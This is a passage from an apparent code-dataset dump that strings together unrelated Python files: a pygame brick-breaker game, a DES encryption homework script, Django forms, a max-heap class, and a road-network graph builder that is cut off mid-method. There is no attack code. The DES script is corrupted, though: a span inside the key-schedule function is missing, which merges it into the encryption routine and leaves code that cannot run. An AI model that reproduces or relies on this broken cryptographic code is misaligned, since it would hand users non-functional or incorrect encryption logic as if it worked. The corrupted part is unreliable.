-10\r\n#设定小球位置\r\nballXpos = screenSize[0]/2 - radius\r\nballYpos = baffleYpos -diameter \r\n#定义颜色\r\nBLACK = (0,0,0)\r\nWHITE = (255,255,255)\r\nBLUE = (0,0,255)\r\nbrickColor = (184,134,11)\r\n\r\n#定义状态常量\r\nState_restarting = 0\r\nState_playing = 1\r\nState_win = 2\r\nState_gameover = 3\r\nState_highscore=4\r\nState_stopping=5\r\n\r\n#程序的封装\r\nclass Brick:\r\n def __init__(self):\r\n #初始化pygame模块\r\n 
pygame.init()\r\n\r\n #初始化混音器\r\n pygame.mixer.init()\r\n pygame.time.delay(1000)\r\n\r\n #创建游戏窗口\r\n self.screen = pygame.display.set_mode(screenSize,0)\r\n#无边框版self.screen = pygame.display.set_mode(screenSize,pygame.NOFRAME)\r\n\r\n #设置窗口标题\r\n pygame.display.set_caption(\"Bricks by zwh\")\r\n\r\n #将图像数据都转化为Surface对象\r\n self.background=pygame.image.load(\"bg.png\").convert()\r\n\r\n #载入背景音乐\r\n self.soundwav=pygame.mixer.Sound(\"bgmusic.wav\")\r\n #设定时钟\r\n self.clock = pygame.time.Clock()\r\n\r\n #载入字体 \r\n self.font = pygame.font.Font(\"Lancy.ttf\",23)\r\n self.font2 = pygame.font.Font(\"Kevin.ttf\",20)\r\n\r\n self.init_game()\r\n\r\n #��取最高分\r\n def highScore(self): \r\n if os.path.isfile(\"highscore.dat\"):\r\n highfile=open(\"highscore.dat\",\"r\")\r\n highscore=highfile.readline() \r\n highfile.close() \r\n else:\r\n highscore=0\r\n return highscore\r\n\r\n #游戏数据初始化(变化的)\r\n def init_game(self):\r\n #初始化生命得分和状态\r\n self.lives = 3\r\n self.score = 0\r\n self.level = 1\r\n #初始化小球速度\r\n self.ballVelocity = ballVelocity\r\n #读取最高分\r\n self.highscore = self.highScore()\r\n self.state = State_restarting\r\n #创建挡板和小球的矩形范围\r\n self.baffle = pygame.Rect(baffleXpos,baffleYpos,baffleWidth,baffleHeight)\r\n self.ball = pygame.Rect(ballXpos,ballYpos,diameter,diameter)\r\n #执行创建砖块矩形函数\r\n self.create_bricks()\r\n\r\n #升级时数据更新\r\n def next_game(self):\r\n self.level+=1\r\n self.lives += 1\r\n self.state = State_restarting\r\n self.baffle = pygame.Rect(baffleXpos,baffleYpos,baffleWidth,baffleHeight)\r\n self.ball = pygame.Rect(ballXpos,ballYpos,diameter,diameter)\r\n self.create_bricks()\r\n \r\n \r\n #创建砖块矩形范围\r\n def create_bricks(self):\r\n ypos= 30\r\n self.bricks = []\r\n for i in range(7):\r\n xpos = 25\r\n for j in range(8):\r\n self.bricks.append(pygame.Rect(xpos,ypos,brickWidth,brickHeight))\r\n xpos += brickWidth+ 10\r\n ypos += brickHeight + 5\r\n\r\n #画出砖块\r\n def draw_bricks(self):\r\n for brick in self.bricks:\r\n pygame.draw.rect(self.screen, brickColor, brick)\r\n #pygame.draw.ellipse(self.screen, brickColor, brick) 椭圆版 \r\n\r\n #侦测键盘输入控制平台位置 \r\n def keyInput(self):\r\n keys = pygame.key.get_pressed()\r\n\r\n #左键左移\r\n if keys[pygame.K_LEFT] and self.state != State_stopping:\r\n self.baffle.left -= baffleVelocity\r\n if self.baffle.left <= minXpos:\r\n self.baffle.left = minXpos\r\n\r\n #右键右移\r\n if keys[pygame.K_RIGHT] and self.state != State_stopping:\r\n self.baffle.left += baffleVelocity\r\n if self.baffle.left >= maxXpos:\r\n self.baffle.left = maxXpos\r\n \r\n # 太空版(测试Win使用)\r\n ##上键上移\r\n if keys[pygame.K_UP]:\r\n self.baffle.top -= baffleVelocity\r\n ##下键下移\r\n if keys[pygame.K_DOWN]:\r\n self.baffle.top += baffleVelocity\r\n \r\n #Space重置\r\n elif keys[pygame.K_SPACE] and self.state == State_restarting:\r\n self.ballVelocity= [4 + self.level,4 + self.level]\r\n # 随机角度发射(+-30°之间)\r\n # base= (4+self.level)*2**0.5\r\n # angle=randrange(-30,30)/180.0*pi\r\n # self.ballVelocity= [base*sin(angle),-base*cos(angle)]\r\n self.state = State_playing\r\n\r\n #失败时回车重新启动\r\n elif keys[pygame.K_RETURN] and (self.state == State_gameover \\\r\n or self.state == State_highscore):\r\n self.init_game()\r\n elif keys[pygame.K_RETURN] and self.state == State_win:\r\n self.next_game()\r\n #游戏时按回车暂停\r\n elif keys[pygame.K_RETURN] and self.state == State_playing:\r\n self.state = State_stopping\r\n elif keys[pygame.K_SPACE] and self.state == State_stopping:\r\n self.state = State_playing\r\n\r\n def move_ball(self):\r\n\r\n #移动距离 速度V*Δt(与帧数相关) 以左上角为标准\r\n self.ball.left += 
self.ballVelocity[0]\r\n self.ball.top += self.ballVelocity[1]\r\n\r\n #碰壁反向\r\n if self.ball.left <= minBallXpos:\r\n self.ball.left = minBallXpos\r\n self.ballVelocity[0] *= -1\r\n elif self.ball.left >= maxBallXpos:\r\n self.ball.left = maxBallXpos\r\n self.ballVelocity[0] *= -1\r\n elif self.ball.top <= minBallYpos:\r\n self.ball.top = minBallYpos \r\n self.ballVelocity[1] *= -1\r\n #触底静止\r\n elif self.ball.top >= maxBallYpos: \r\n self.ball.top = maxBallYpos\r\n\r\n #碰撞处理\r\n def collision(self):\r\n\r\n #对于每一块砖块进行判断 加分 反弹 砖块消除\r\n for brick in self.bricks:\r\n if self.ball.colliderect(brick):\r\n self.score += 10*self.level\r\n self.ballVelocity[1] *= -1\r\n self.bricks.remove(brick)\r\n break\r\n #碰撞挡板反弹\r\n if self.ball.colliderect(self.baffle):\r\n self.ball.top = self.baffle.top - diameter\r\n self.ballVelocity[1] *= -1\r\n\r\n #状态判断模块\r\n if self.bricks == []:\r\n self.state = State_win\r\n \r\n elif self.ball.top == maxBallYpos:\r\n self.lives -= 1\r\n if self.lives > 0:\r\n self.state = State_restarting\r\n #死亡操作\r\n elif self.lives == 0 and self.score > int(self.highscore):\r\n self.state = State_highscore\r\n else:\r\n self.state = State_gameover\r\n \r\n def writeHighScore(self): #写入最高分\r\n highfile=open(\"highscore.dat\",\"w\") \r\n highfile.writelines(str(self.score)) \r\n highfile.close() \r\n \r\n #显示基本状态\r\n def show_stats(self):\r\n myRecord = self.font2.render(\"RECORD: \" + str(self.highscore), True, WHITE)\r\n myScore = self.font2.render(\" SCORE: \" + str(self.score), True, WHITE)\r\n myLife = self.font2.render(\" LIVES: \" + str(self.lives), True, WHITE)\r\n myLevel = self.font.render(\" LEVLE \" + str(self.level), True, WHITE)\r\n self.screen.blit(myRecord, (450,5))\r\n self.screen.blit(myScore, (300,5))\r\n self.screen.blit(myLife, (200,5))\r\n self.screen.blit(myLevel, (0,0))\r\n #获取程序Fps\r\n # self.fps=int(self.clock.get_fps()) #为了去掉末尾的小数\r\n # myfps=self.font2.render(\"FPS: \" + str(self.fps) , True, WHITE)\r\n # self.screen.blit(myfps, (5,580))\r\n\r\n #显示关键信息模块\r\n def show_message(self,message):\r\n #获取字体大小使文字显示在中央\r\n size = self.font.size(message)\r\n font_surface = self.font.render(message,True, WHITE)\r\n x = (screenSize[0] - size[0]) / 2\r\n y = (screenSize[1] - size[1]) / 2\r\n self.screen.blit(font_surface, (x,y))\r\n \r\n \r\n #运行过程 \r\n def run(self):\r\n #播放背景音乐(-1表示循环)\r\n self.soundwav.play(-1)\r\n\r\n while True: \r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n #控制帧数\r\n self.clock.tick(100)\r\n #生成背景\r\n self.screen.blit(self.background, (0,0))\r\n #self.screen.fill((0,0,0))#黑屏版\r\n #self.screen.fill((255,255,255))#白屏版\r\n\r\n #执行按键侦测\r\n self.keyInput()\r\n #判断游戏所处在的状态并给出相应反馈\r\n if self.state == State_playing: #只有在该状态下才会触发移动和碰撞\r\n self.move_ball()\r\n self.collision()\r\n elif self.state == State_restarting:\r\n self.ball.left = self.baffle.left + self.baffle.width / 2 - radius\r\n self.ball.top = self.baffle.top - self.ball.height\r\n self.show_message(\"Press SPACE to Launch the Ball\")\r\n elif self.state == State_gameover:\r\n self.show_message(\"~Game over!~Press ENTER to retry\")\r\n elif self.state == State_highscore:\r\n self.show_message(\"~New Record!!!~Press ENTER to play again\")\r\n self.writeHighScore()\r\n elif self.state == State_win:\r\n self.show_message(\"~Congratulations!~Press ENTER to go\")\r\n elif self.state == State_stopping:\r\n self.show_message(\"~Pause~\")\r\n\r\n #画出砖块\r\n self.draw_bricks()\r\n #执行显示状态\r\n self.show_stats()\r\n #画出挡板\r\n 
pygame.draw.rect(self.screen, BLUE, self.baffle)\r\n #画出小球\r\n pygame.draw.circle(self.screen, WHITE, \\\r\n (self.ball.left + radius, self.ball.top + radius), radius)\r\n\r\n #更新显示到屏幕表面\r\n pygame.display.flip()\r\n\r\nmyMasterpiece=Brick()\r\nmyMasterpiece.run()\r\n","sub_path":"[bug]BricksV1.35更新随机角度发射.py","file_name":"[bug]BricksV1.35更新随机角度发射.py","file_ext":"py","file_size_in_byte":10834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"381603585","text":"from __future__ import print_function\nfrom BitVector import *\nfrom tables import *\n\n#key file\nkey_filename = 'key.txt'\n\n#message file\nmsg_filename = 'message.txt'\n\n#holds key for all 16 rounds\nkey_round = []\n\n\ndef getEncryptionKeys(key):\n mkey = key.deep_copy()\n mkey = mkey.permute(pc1)\n left, right = mkey.divide_into_two()\n for r in shift_round:\n left< 0:\n if bv1.length() < 64:\n pad = 64 - bv1.length()\n temp = bv1 + BitVector(intVal=0, size=pad)\n ev = des(temp)\n ev.write_to_file(output_file)\n else:\n ev = des(bv1)\n ev.write_to_file(output_file)\n bv1 = bv.read_bits_from_file(64)\n output_file.close()\n bv.close_file_object()\n\n\ndef des(msg):\n msg = msg.deep_copy()\n msg = msg.permute(ip)\n left, right = msg.divide_into_two()\n for i in range(0, 16):\n\n temp_right = substitute(right,key_round[i])\n temp_right = left ^ temp_right\n left, right = right, temp_right\n msg = right + left\n msg = msg.permute(inverse_ip)\n return msg\n\n\ndef substitute(right,key):\n mright = right.deep_copy()\n mright = mright.permute(exp_perm)\n mright = mright ^ key\n count = 0\n sv = []\n for i in range(0,43,6):\n t = mright[i:i+6]\n r = str(t[0]) + str(t[5])\n c = t[1:5]\n x = s_boxes[count][int(r, 2)][int(c)]\n sv.append(BitVector(intVal=x, size=4))\n count += 1\n rsv = sv[0]\n for i in range(1, len(sv)):\n rsv = rsv + sv[i]\n rsv = rsv.permute(perm)\n return rsv\n\n\ndef main():\n key = read_key()\n getEncryptionKeys(key)\n enc_message()\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n","sub_path":"NS/hw2/DES/des.py","file_name":"des.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"185452548","text":"from django.forms import ModelForm, ValidationError, CheckboxSelectMultiple\nfrom django.contrib import messages\nfrom django.forms.models import modelformset_factory\nfrom django.urls import reverse_lazy\nfrom functools import reduce\nimport magic \n\nfrom .models import Tag, Asset\n\n# ----------------------------------------------------------------------\n# FORMS \n# ----------------------------------------------------------------------\nclass Tag_Create_Form(ModelForm):\n\n class Meta:\n model = Tag\n fields = ['name'] \n\n def form_valid(self, form):\n messages.success(self.request, 'Tag aggiunto.')\n return super(Tag_Create_Form, self).form_valid(form)\n\nclass Asset_Select_Form(ModelForm):\n\n class Meta:\n model: Asset\n fields = ['isSelected']\n\nclass Asset_Upload_Form(ModelForm):\n\n class Meta:\n model = Asset\n fields = ['typeOf', 'resource', 'tag']\n widgets = {\n 'tag' : CheckboxSelectMultiple()\n }\n\n def clean(self):\n # get data\n data = self.cleaned_data\n # # get field values\n # resource = data['resource']\n # typeOf = data['typeOf']\n # # --------------------------------------------\n # # mime type check\n # # --------------------------------------------\n # mime = magic.from_buffer(resource.read(), mime=True)\n # if reduce(lambda acc, itr: 
mime.find(itr.lower()) + acc, Asset.ASSETS_MIMETYPES, 0) == len(Asset.ASSETS_MIMETYPES) * -1:\n # self.add_error('resource', ValidationError('Tipo di file non riconosciuto.', code=\"invalid type\"))\n # # --------------------------------------------\n # # file size check\n # # --------------------------------------------\n # if resource.size > Asset.ASSET_FILES_LIMITS[typeOf]:\n # self.add_error('resource', ValidationError('File di dimensioni eccessive.', code=\"invalid size\"))\n # return data\n return data\n\nclass Asset_Update_Form(Asset_Upload_Form): \n \n # set required to false in update form\n def __init__(self, *args, **kwargs):\n super(Asset_Update_Form, self).__init__(*args, **kwargs)\n self.fields['resource'].required = False \n\n# ----------------------------------------------------------------------\n# FORMSETS\n# ----------------------------------------------------------------------\nTag_Formset_Factory = modelformset_factory(\n Tag,\n Tag_Create_Form,\n extra=1,\n can_delete=True\n)\n\nAsset_Formset_Factory = modelformset_factory(\n Asset,\n Asset_Select_Form,\n extra=0,\n can_delete=True\n)","sub_path":"apps/filer/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"123379002","text":"import random\n\nclass HeapEmptyException(Exception):\n pass\n\nclass Heap(object):\n '''A class representing a heap'''\n \n def __init__(self, insert_list= []):\n '''(Heap [,list]) -> NoneType\n Create a new Heap containing the elements in insert_list\n '''\n self._heap = []\n for element in insert_list:\n self.insert(element)\n \n def is_empty(self):\n '''(Heap) -> bool\n Return True iff there are no nodes in this Heap\n '''\n return self._heap == []\n \n def insert(self, insert_value):\n '''(Heap, object) -> NoneType\n Insert insert_value into the heap\n REQ: insert_value is not already in the heap\n '''\n self._heap.append(insert_value)\n self._bubble_up()\n \n \n def _bubble_up(self):\n '''(Heap) -> NoneType\n Re-arrange the values in the heap to maintain the heap property after\n a new element has been inserted into the heap\n '''\n c_index = len(self._heap) -1\n p_index = (c_index -1) // 2\n #Keep looping as long as we're still violating the heap condition\n while(c_index > 0 and self._heap[c_index] > self._heap[p_index]):\n #swap the parent and child\n self._swap(c_index, p_index)\n #check the next level up\n c_index = p_index\n p_index = (p_index -1) // 2\n\n def _swap(self, i, j):\n '''(Heap, int, int) -> NoneType\n Swap the values at index i and j\n '''\n (self._heap[i], self._heap[j]) = (self._heap[j], self._heap[i])\n \n def __str__(self):\n '''(Heap) -> str\n Return a string representation of this Heap\n '''\n return str(self._heap) + \"\\n\" + self._str_helper(0, \"\")\n \n def _str_helper(self, node_index, indentation):\n '''(Heap, int, str) -> str\n Return a string representation of the node at node_index, indented\n with indentation\n '''\n \n #base case: this node doens't exist\n if(node_index >= len(self._heap)):\n return \"\"\n else:\n #RD: print left, then self, then right\n lc_index = (node_index * 2) + 1\n rc_index = (node_index * 2) + 2 \n ret = self._str_helper(rc_index, indentation + \"\\t\")\n ret += indentation + str(self._heap[node_index]) + \"\\n\"\n ret += self._str_helper(lc_index, indentation + \"\\t\")\n return ret\n \n def remove_top(self):\n '''(Heap) -> object\n Remove and return the largest element in the heap\n RAISES: 
HeapEmptyException if heap is empty\n '''\n if(len(self._heap) == 0):\n raise HeapEmptyException(\"Attempt to remove top of empty heap\")\n else:\n #save the top element\n ret = self._heap[0]\n #remove the last element from the heap, and \n #replace the head's value with it\n last = self._heap.pop()\n if(len(self._heap) > 0):\n self._heap[0] = last\n self._bubble_down()\n return ret\n \n def _bubble_down(self):\n '''(Heap) -> NoneType\n Re-arrange the values in the heap to maintain the heap property after\n the top element of the heap has been removed\n '''\n p_index = 0\n lt_index = (p_index * 2) + 1\n rt_index = (p_index * 2) + 2\n #keep looping while we violate the heap property\n while(self._violates(p_index)):\n #one of our children violates the heap property\n #if we only have a left child, it must be that one\n if(rt_index >= len(self._heap)):\n self._swap(p_index, lt_index)\n p_index = lt_index\n \n #if we have two children, we need to swap with the larger child\n elif(self._heap[lt_index] > self._heap[rt_index]):\n self._swap(p_index, lt_index)\n p_index = lt_index\n else:\n self._swap(p_index, rt_index)\n p_index = rt_index\n #find the new children for the next loop\n lt_index = (p_index * 2) + 1\n rt_index = (p_index * 2) + 2\n \n \n \n \n def _violates(self, index):\n '''(Heap, int) -> bool\n Return True iff the node at index and one of its children violate the\n heap property\n '''\n lt_index = (index * 2) + 1\n rt_index = (index * 2) + 2\n #if we have no children, we're fine\n if(lt_index >= len(self._heap)):\n return False\n #if we have one child, return True iff it violates\n elif(rt_index >= len(self._heap)):\n return self._heap[lt_index] > self._heap[index]\n #if we have two children, return True if either child violates\n else:\n return (self._heap[lt_index] > self._heap[index]\n or self._heap[rt_index] > self._heap[index])\n\nif(__name__ == \"__main__\"):\n \n my_unordered_list = [3,6,1,5,2,10,15]\n heap_test = Heap(my_unordered_list)\n print(heap_test)\n heap_test.remove_top()\n print(heap_test)\n \n \n '''\n my_unordered_list = []\n for i in range(100):\n my_unordered_list.append(random.random() * 100)\n my_heap = Heap(my_unordered_list)\n #print(my_heap)\n my_ordered_list = []\n #my_heap.remove_top()\n #print(\"---\")\n #print(my_heap)\n while(not my_heap.is_empty()):\n my_ordered_list.append(my_heap.remove_top())\n print(my_heap)\n print(my_unordered_list)\n '''\n \n","sub_path":"Review/Heap/heap.py","file_name":"heap.py","file_ext":"py","file_size_in_byte":5639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"155010385","text":"\"\"\"\nThis class implements the top-level functions that maintain road networks in memory. The road network should be\nrepresented in three different ways called Views:\n\n1. tileView: A tile -> set of blue_edge_id mapping. The tile is a 1km x 1km region that is represented by the latitude, longitude of\nits center. In python, we store this as a dictionary of lists. {(latitude, longitude): [edge_id_1, edge_id_2...], ...}\n2. SegmentView: A networkx Graph object where the nodes are the blue nodes (points along a road) and the edges are the blue edges.\nA blue edge is a fundamental unit of the road that is assumed to be a straight line segment.\n3. 
SettlementView: A networkx Graph object where the nodes are settlements and edges are roads that connect these settlements.\nThe \"red\" edges each have two sets as attributes: The set of blue nodes along the inter-settlement road, and the set of\nblue edges that form up that road.\n\"\"\"\nimport csv\nimport math\nfrom itertools import combinations\nfrom copy import deepcopy\n\nimport networkx as nx\nfrom networkx import NetworkXNoPath\nimport pandas as pd\nfrom poseidon.infrastructure.geo_location import GeoLocation\n\n\nclass RoadNetwork:\n DATA_DIR = \"dat\"\n CITY_PERIMETER = 2 # 2 km bounding box distance for cities\n graph_segment_view = None\n graph_settlement_view = None\n graph_tile_view = None\n\n def __init__(self, recreate_files=False):\n if recreate_files:\n self.construct_segment_view()\n self.construct_settlement_view_from_parts()\n self.construct_tile_view()\n self.graph_segment_view = nx.read_gpickle(f\"{self.DATA_DIR}/graph_segment_view.gpickle\")\n self.graph_settlement_view = nx.read_gpickle(f\"{self.DATA_DIR}/graph_settlement_view.gpickle\")\n try:\n self.graph_tile_view = nx.read_gpickle(f\"{self.DATA_DIR}/graph_tile_view.gpickle\")\n except FileNotFoundError:\n print(\"Couldn't find tile view file. If your segment view file exists, I will create the tile view now\")\n self.construct_tile_view()\n\n self.make_helper_maps()\n\n # creates a couple of precomputed helper maps to speed up computation\n # A map from blue nodes to a list of red edges it supports\n\n def make_helper_maps(self):\n self.initial_shortest_path_lengths = {}\n\n for red_edge_u, red_edge_v, attr in self.graph_settlement_view.edges(data=True):\n blue_u = attr['blue_nodes'][1]\n blue_v = attr['blue_nodes'][-2]\n if len(attr['blue_nodes']) == 2:\n self.initial_shortest_path_lengths[(red_edge_u, red_edge_v)] = 0\n continue\n try:\n self.initial_shortest_path_lengths[(red_edge_u, red_edge_v)] = nx.shortest_path_length(\n self.graph_segment_view, blue_u, blue_v)\n except NetworkXNoPath:\n self.initial_shortest_path_lengths[(red_edge_u, red_edge_v)] = len(self.graph_segment_view)\n\n\n # constructs the segment_view and saved it into graph_segment_view.gpickle\n def construct_segment_view(self):\n print(\"Building segment view...\")\n graph_segment_view = nx.Graph()\n with open(f\"{self.DATA_DIR}/cal.cnode.csv\") as f:\n for row in csv.reader(f):\n lat = float(row[2])\n lng = float(row[1])\n node_id = row[0]\n graph_segment_view.add_node(\n node_id,\n pos=GeoLocation.from_degrees(lat, lng),\n mappedToCity=False\n )\n\n with open(f\"{self.DATA_DIR}/cal.cedge.csv\") as f:\n for row in csv.reader(f):\n graph_segment_view.add_edge(row[1], row[2], d=row[3])\n\n nx.write_gpickle(graph_segment_view, f\"{self.DATA_DIR}/graph_segment_view.gpickle\")\n self.graph_segment_view = graph_segment_view\n print(\"Done\")\n print(graph_segment_view.number_of_nodes(), \"blue segments.\")\n print(graph_segment_view.number_of_edges(), \"blue edges.\")\n\n # constructs 'representative_nodes' for each city (red node)\n # then combines all blue nodes within the cities perimeter into the representative node.\n # cities with bigger population will get the veto in case more than one city claims the blue node.\n def get_combined_nodes_within_city_perimeter(self, read_from_file=False):\n if read_from_file:\n return nx.read_gpickle(f\"{self.DATA_DIR}/graph_segment_view_nodes_combined.gpickle\")\n\n settlement_df = pd.read_csv(f\"{self.DATA_DIR}/cal.csv\")\n\n # sort by population -> larger cities will get to pick the blue nodes 
first.\n settlement_df.sort_values(by='population', ascending=False, inplace=True)\n\n graph_segment_view = nx.read_gpickle(f\"{self.DATA_DIR}/graph_segment_view.gpickle\")\n graph_segment_view_nodes_combined = graph_segment_view.copy()\n\n # let's start\n print(\"Merging blue nodes...\")\n print(f\"Started with {graph_segment_view_nodes_combined.number_of_nodes()} blue segments.\")\n counter, num_cities = 0, len(settlement_df) # just so we can keep tabs in the console\n for index, city in settlement_df.iterrows():\n counter += 1\n print(f\"\\r{counter}/{num_cities} :: {city['city']} \", end=\"\")\n\n city_location = GeoLocation.from_degrees(float(city['lat']), float(city['lng']))\n sw_bound, ne_bound = city_location.bounding_locations(self.CITY_PERIMETER)\n\n # first we'll add a blue node that will represent the entire city\n graph_segment_view_nodes_combined.add_node(\n city['id'],\n pos=GeoLocation.from_degrees(float(city['lat']), float(city['lng'])),\n mappedToCity=True\n )\n representative_node = city['id']\n\n # now we will combine all blue nodes that fall within the city perimeters\n for node_id, blue_node in graph_segment_view_nodes_combined.nodes(data=True):\n try:\n if blue_node['mappedToCity']:\n continue\n except KeyError:\n pass\n # try:\n if blue_node['pos'].within_bounds(sw_bound, ne_bound):\n graph_segment_view_nodes_combined = nx.contracted_nodes(\n graph_segment_view_nodes_combined,\n representative_node,\n str(node_id),\n self_loops=False\n )\n\n # when we merge nodes, it stores all the properties of the previous node too.\n # this can get very long. and we don't need it anyway. therefore we clear this field.\n graph_segment_view_nodes_combined.nodes[representative_node]['contraction'] = {}\n # except:\n # print(blue_node)\n\n # we're done! 
let's finally write the graph into a file\n nx.write_gpickle(\n graph_segment_view_nodes_combined, f\"{self.DATA_DIR}/graph_segment_view_nodes_combined.gpickle\"\n )\n\n print(f\"\\nAfter merging we have {graph_segment_view_nodes_combined.number_of_nodes()} blue segments.\")\n\n return graph_segment_view_nodes_combined\n\n # combines blue node 1 to blue node 2, if 1 has less than 2 out-degree\n # we're just simplifying the paths so building settlement doesn't take 60 hours.\n def get_two_neighbor_combined_nodes(self, read_from_file=False):\n if read_from_file:\n return nx.read_gpickle(f\"{self.DATA_DIR}/graph_segment_two_neighbor_combined_nodes.gpickle\")\n\n graph_segment_two_neighbor_combined_nodes = self.get_combined_nodes_within_city_perimeter(True)\n\n print(f\"Started with {graph_segment_two_neighbor_combined_nodes.number_of_nodes()} blue segments.\")\n counter, num_nodes = 0, graph_segment_two_neighbor_combined_nodes.number_of_nodes()\n for node_id, blue_node in graph_segment_two_neighbor_combined_nodes.nodes(data=True):\n counter += 1\n print(f\"\\r{counter} / {num_nodes}\", end=\"\")\n try:\n if blue_node['mappedToCity']:\n continue\n except KeyError:\n pass\n degree = graph_segment_two_neighbor_combined_nodes.degree(node_id)\n if degree == 0:\n graph_segment_two_neighbor_combined_nodes.remove_node(node_id)\n elif degree <= 2:\n neighbor_node = next(graph_segment_two_neighbor_combined_nodes.neighbors(node_id))\n graph_segment_two_neighbor_combined_nodes = nx.contracted_nodes(\n graph_segment_two_neighbor_combined_nodes,\n neighbor_node,\n str(node_id),\n self_loops=False\n )\n\n graph_segment_two_neighbor_combined_nodes.nodes[neighbor_node]['contraction'] = {}\n\n print(f\"\\nAfter merging we have {graph_segment_two_neighbor_combined_nodes.number_of_nodes()} blue segments.\")\n # we're done! let's finally write the graph into a file\n nx.write_gpickle(\n graph_segment_two_neighbor_combined_nodes, f\"{self.DATA_DIR}/graph_segment_two_neighbor_combined_nodes.gpickle\"\n )\n return graph_segment_two_neighbor_combined_nodes\n\n # Does the same thing as get_two_neighbor_combined_nodes once more.\n # this only reduces the number of nodes by ~5%. 
So, we stop here.\n def get_four_neighbor_combined_nodes(self, read_from_file=False):\n if read_from_file:\n return nx.read_gpickle(f\"{self.DATA_DIR}/graph_segment_four_neighbor_combined_nodes.gpickle\")\n\n graph_segment_four_neighbor_combined_nodes = self.get_two_neighbor_combined_nodes(True)\n\n print(f\"Started with {graph_segment_four_neighbor_combined_nodes.number_of_nodes()} blue segments.\")\n counter, num_nodes = 0, graph_segment_four_neighbor_combined_nodes.number_of_nodes()\n for node_id, blue_node in graph_segment_four_neighbor_combined_nodes.nodes(data=True):\n counter += 1\n print(f\"\\r{counter} / {num_nodes}\", end=\"\")\n try:\n if blue_node['mappedToCity']:\n continue\n except KeyError:\n pass\n degree = graph_segment_four_neighbor_combined_nodes.degree(node_id)\n if degree == 0:\n graph_segment_four_neighbor_combined_nodes.remove_node(node_id)\n elif degree <= 2:\n neighbor_node = next(graph_segment_four_neighbor_combined_nodes.neighbors(node_id))\n graph_segment_four_neighbor_combined_nodes = nx.contracted_nodes(\n graph_segment_four_neighbor_combined_nodes,\n neighbor_node,\n str(node_id),\n self_loops=False\n )\n\n graph_segment_four_neighbor_combined_nodes.nodes[neighbor_node]['contraction'] = {}\n\n print(f\"\\nAfter merging we have {graph_segment_four_neighbor_combined_nodes.number_of_nodes()} blue segments.\")\n # we're done! let's finally write the graph into a file\n nx.write_gpickle(\n graph_segment_four_neighbor_combined_nodes,\n f\"{self.DATA_DIR}/graph_segment_four_neighbor_combined_nodes.gpickle\"\n )\n return graph_segment_four_neighbor_combined_nodes\n\n # this method is redundant, and got replaced by construct_settlement_view_using_combined_nodes\n def construct_settlement_view_using_shortest_path(self):\n print(\"Building settlement view...\")\n graph_settlement_view = nx.Graph()\n\n # first we'll read all the cities -- our RED nodes, and store them as nodes into the settlement_view\n settlement_df = pd.read_csv(f\"{self.DATA_DIR}/cal.csv\")\n settlement_df.sort_values(by='population', ascending=False, inplace=True)\n\n for index, city in settlement_df.iterrows():\n graph_settlement_view.add_node(\n city['id'],\n pos=GeoLocation.from_degrees(float(city['lat']), float(city['lng'])),\n name=city['city'],\n population=city['population']\n )\n print(f\"Read {graph_settlement_view.number_of_nodes()} red nodes.\")\n\n # now, we'll combine all blue nodes within city perimeters into a single node\n graph_segment_view_nodes_combined = self.get_combined_nodes_within_city_perimeter(True)\n print(f\"Read {graph_segment_view_nodes_combined.number_of_nodes()} merged blue nodes.\")\n\n # for every red node u,\n # for every red node v:\n # remove all red nodes other than u and v\n # find shortest blue path between u and v\n # add red edge between u and v\n all_red_nodes = list(graph_settlement_view.nodes())\n\n import time\n start = time.time()\n print(f\"Start: {start}\")\n\n red_node_degrees = dict()\n red_nodes_with_edges = list()\n for red_node in all_red_nodes:\n red_node_degrees[red_node] = graph_segment_view_nodes_combined.degree(red_node)\n if red_node_degrees[red_node]:\n red_nodes_with_edges.append(red_node)\n\n # for u, v in combinations(all_red_nodes, 2):\n for i, u in enumerate(red_nodes_with_edges):\n for j, v in enumerate(red_nodes_with_edges[i+1:]):\n print(f\"\\r{i}x{j} / {len(red_nodes_with_edges)}\", end=\"\")\n graph_segment_view_other_nodes_removed = graph_segment_view_nodes_combined.copy()\n for red_node in red_nodes_with_edges:\n if red_node not 
in [u, v]:\n graph_segment_view_other_nodes_removed.remove_node(red_node)\n if nx.has_path(graph_segment_view_other_nodes_removed, u, v):\n path = nx.shortest_path(graph_segment_view_other_nodes_removed, u, v)\n graph_settlement_view.add_edge(u, v, blue_nodes=path)\n print(f\"\\tDuration: {time.time() - start}\", end=\"\")\n\n nx.write_gpickle(graph_settlement_view, f\"{self.DATA_DIR}/graph_settlement_view.gpickle\")\n self.graph_settlement_view = graph_settlement_view\n\n # uses the four_neighbor_combined_nodes to construct the settlemet view using shortest path algorithm\n # even this takes ~ 3 hours.\n # therefore I split it into 5 google colabs and ran it to produce parts\n # the ratio of nodes for parts were - 0-113, 113-242, 242-395, 395-595, 595-1073\n def construct_settlement_view_using_combined_nodes(self):\n print(\"Building settlement view...\")\n graph_settlement_view = nx.Graph()\n\n # first we'll read all the cities -- our RED nodes, and store them as nodes into the settlement_view\n settlement_df = pd.read_csv(f\"{self.DATA_DIR}/cal.csv\")\n settlement_df.sort_values(by='population', ascending=False, inplace=True)\n\n for index, city in settlement_df.iterrows():\n graph_settlement_view.add_node(\n city['id'],\n pos=GeoLocation.from_degrees(float(city['lat']), float(city['lng'])),\n name=city['city'],\n population=city['population']\n )\n print(f\"Read {graph_settlement_view.number_of_nodes()} red nodes.\")\n\n # now, we'll combine all blue nodes within city perimeters into a single node\n graph_segment_view_nodes_combined = self.get_combined_nodes_within_city_perimeter(True)\n print(f\"Read {graph_segment_view_nodes_combined.number_of_nodes()} merged blue nodes.\")\n\n # we'll also combine all blue nodes which have just two neighbors\n graph_segment_two_neighbor_combined_nodes = self.get_two_neighbor_combined_nodes(True)\n print(f\"Read {graph_segment_two_neighbor_combined_nodes.number_of_nodes()} merged blue nodes.\")\n\n # we'll do the same again\n graph_segment_four_neighbor_combined_nodes = self.get_four_neighbor_combined_nodes(True)\n print(f\"Read {graph_segment_four_neighbor_combined_nodes.number_of_nodes()} merged blue nodes.\")\n\n # 